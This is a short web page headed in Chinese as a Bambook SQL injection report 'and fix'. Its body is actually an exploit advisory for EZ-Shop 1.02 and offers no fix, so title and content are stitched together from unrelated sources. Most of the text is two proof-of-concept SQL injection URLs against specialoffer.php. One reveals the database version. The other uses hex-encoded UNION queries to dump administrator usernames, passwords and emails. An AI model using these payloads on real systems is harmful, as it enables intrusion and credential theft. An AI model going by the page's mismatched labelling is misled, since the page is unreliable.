Bambook某频道SQL注射漏洞及修复

Bambook某频道SQL注射漏洞及修复

Bambook某频道SQL注射漏洞及修复 篇1

[+]info:

~~~~~~~~~

[Script]EZ-Shop 1.02

[Location]www.fcsoftware.co.uk/index.php?page=opensource

[Vulnerability]SQL Injection

[Original Adv]y-osirys.com/security/exploits/id28

[Author]Giovanni Buzzin, ”Osirys“

[Site]y-osirys.com

[Contact]osirys[at]autistici[dot]org

[+]poc:

~~~~~~~~~

MySQL Version p0c:

[p0c]

/[cms path]/specialoffer.php?specialid=1 union select 1,2,concat(0x312720756e696f6e2073656c65637

420312c322c2f2a,@@version,0x2a2f404076657273696f6e2c342c3523)%23

[/p0c]

Admins details p0c:

[p0c]

/[cms_path]/specialoffer.php?specialid=1 union select 1,2,concat(0x312720756e696f6e2073656c65637

420312c322c2f2a,@@version,0x2a2f636f6e63617428307833612c76617261646d696e6e616d652c307833612c76617

270617373776f72642c307833612c766172656d61696c2c30783361292c342c352066726f6d2074626c61646d696e23)%23